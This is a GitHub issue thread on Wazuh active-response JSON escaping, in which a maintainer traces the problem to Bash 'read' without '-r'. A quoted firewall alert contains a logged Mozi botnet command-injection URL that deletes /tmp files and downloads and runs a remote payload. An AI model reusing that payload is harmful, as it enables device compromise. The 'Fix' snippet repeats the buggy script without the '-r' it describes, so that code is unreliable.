### ISSUE TITLE
active_response JSON incorrectly formatted

### ISSUE THREAD

**Issue by michelep** [wazuh/wazuh#10411]
Wazuh 4.2.2 on Debian 10 x86_64

active_response now send a JSON contains event details. Field "full_log" was not correctly escaped, like:

`{"version":1,"origin":{"name":"node01","module":"wazuh-execd"},"command":"add","parameters":{"extra_args":[],"alert":{"timestamp":"2021-10-05T12:04:35.067+0200","rule":{"level":5,"description":"WAF blocked","id":"81671","firedtimes":1,"mail":false,"groups":["fortigate","syslog"]},"agent":{"id":"000","name":"siem"},"manager":{"name":"siem"},"id":"1633428275.953582","full_log":**"date=2021-10-05 time=12:04:34 devname="F01" devid="FG" eventtime=1633428275082701093 tz="+0200" logid="12" type="utm" subtype="waf" eventtype="waf-signature" level="warning" vd="root" policyid=844 sessionid=2706434324 profile="WAF_default" srcip=x.x.x.x srcport=1827 dstip=y.y.y.y dstport=80 srcintf="port12" srcintfrole="wan" dstintf="port4" dstintfrole="dmz" proto=6 service="HTTP" url="http://y.y.y.y/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1" severity="high" action="blocked" direction="request" eventid=50010001 msg="Generic Attacks"","decoder":{"name":"fortigate-firewall-v6"},"data":{"action":"blocked","srcip":"x.x.x.x","srcport":"1827","dstip":"y.y.y.y","dstport":"80","url":"http://y.y.y.y/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1","direction":"request","dstintf":"port4","dstintfrole":"dmz","eventid":"50010001","eventtime":"1633428275082701093","eventtype":"waf-signature","ip":"x.x.x.x","level":"warning","logid":"1200030248","msg":"Generic Attacks","policyid":"844","profile":"WAF_default","proto":"6","service":"HTTP","sessionid":"270243444","severity":"high","srcintf":"port27","srcintfrole":"wan","subtype":"waf","time":"12:04:34","type":"utm","vd":"root"},"location":"r.r.r.r"},**"program":"active-response/bin/ip-block.sh"}}`

This cause json parsing error on active-response scripts.

**Comment by vikman90** [comment]
Hi @michelep,

I'm checking the JSON builder, I could not reproduce this problem so far.

In order to rule out any problem in the reader, could you share more details about your script with us?

How did you get that string? If that is a Bash script, you may use `cat` to create an exact copy of the input:
```sh
cat >> /tmp/raw.json
```

There is a known JSON escaping issue in Bash when using `read` and `echo`. Just in case, if your script uses `read` please check that option `-r` is enabled:
```sh
read -r json
echo json
```

Hope that helps.
Best regards.

**Comment by vikman90** [comment]
Hi @michelep,

Just as I said last week, I wonder if the problem is in the script `active-response/bin/ip-block.sh` as the JSON handling in the agent seems OK.

You can enable debug-2 to inspect the internal JSON messages in the agent:

```sh
echo 'execd.debug=2' >> /var/ossec/etc/local_internal_options.conf
service wazuh-agent restart
```

## AR sample

### Script:

This script has a bug: **it won't capture the JSON message properly**:

```sh
#! /bin/bash

read  data
echo "`date`: $data" >> logs/active-responses.log
````

### Input log

```
Hello "World"
```

### Alert

```json
{"timestamp":"2021-10-11T10:56:43.790+0200","rule":{"level":5,"description":"Hello World.","id":"100001","firedtimes":1,"mail":false,"groups":["local","syslog","sshd"]},"agent":{"id":"000","name":"Rocket"},"manager":{"name":"Rocket"},"id":"1633942603.325719","full_log":"Hello \"World\"","decoder":{},"location":"test"}
```

### Execd logs (ossec.log)

```2021/10/11 10:56:43 wazuh-execd[14697] execd.c:416 at ExecdStart(): DEBUG: Received message: '{"version":1,"origin":{"name":"node01","module":"wazuh-analysisd"},"command":"demo0","parameters":{"extra_args":[],"alert":{"timestamp":"2021-10-11T10:56:43.790+0200","rule":{"level":5,"description":"Hello World.","id":"100001","firedtimes":1,"mail":false,"groups":["local","syslog","sshd"]},"agent":{"id":"000","name":"Rocket"},"manager":{"name":"Rocket"},"id":"1633942603.325719","full_log":"Hello \"World\"","decoder":{},"location":"test"}}}'

2021/10/11 10:56:43 wazuh-execd[14697] execd.c:484 at ExecdStart(): DEBUG: Executing command 'active-response/bin/demo.sh {"version":1,"origin":{"name":"node01","module":"wazuh-execd"},"command":"add","parameters":{"extra_args":[],"alert":{"timestamp":"2021-10-11T10:56:43.790+0200","rule":{"level":5,"description":"Hello World.","id":"100001","firedtimes":1,"mail":false,"groups":["local","syslog","sshd"]},"agent":{"id":"000","name":"Rocket"},"manager":{"name":"Rocket"},"id":"1633942603.325719","full_log":"Hello \"World\"","decoder":{},"location":"test"},"program":"active-response/bin/demo.sh"}}'
```

Both the message received and the command run seem right.

### active-responses.log

```
Mon Oct 11 10:56:43 CEST 2021: {"version":1,"origin":{"name":"node01","module":"wazuh-execd"},"command":"add","parameters":{"extra_args":[],"alert":{"timestamp":"2021-10-11T10:56:43.790+0200","rule":{"level":5,"description":"Hello World.","id":"100001","firedtimes":1,"mail":false,"groups":["local","syslog","sshd"]},"agent":{"id":"000","name":"Rocket"},"manager":{"name":"Rocket"},"id":"1633942603.325719","full_log":"Hello "World"","decoder":{},"location":"test"},"program":"active-response/bin/demo.sh"}}
```

Here is the problem: the JSON message as printed in `active-responses.log` is corrupted!

## Fix

I solved the problem by adding `-r` to the command `read`:
```sh
#! /bin/bash

read  data
echo "`date`: $data" >> logs/active-responses.log
```

### active-responses.log (after)

```json
Mon Oct 11 11:37:08 CEST 2021: {"version":1,"origin":{"name":"node01","module":"wazuh-execd"},"command":"add","parameters":{"extra_args":[],"alert":{"timestamp":"2021-10-11T11:37:08.406+0200","rule":{"level":5,"description":"Hello World.","id":"100001","firedtimes":1,"mail":false,"groups":["local","syslog","sshd"]},"agent":{"id":"000","name":"Rocket"},"manager":{"name":"Rocket"},"id":"1633945028.325858","full_log":"Hello \"World\"","decoder":{},"location":"test"},"program":"active-response/bin/demo.sh"}}
```

Now, the JSON string seems good. 

Please, follow the steps above to get the messages handled by Execd before running the AR, in order to ensure that it's received correctly. If they are correct, please check your script, maybe you can debug it with sample JSON messages:

```sh
echo '{"object": {"string": "Hello \"World\""}}' | active-response/bin/ip-block.sh
```

If you need further help to debug your script, you can share that with us, and we will be happy to help you out.
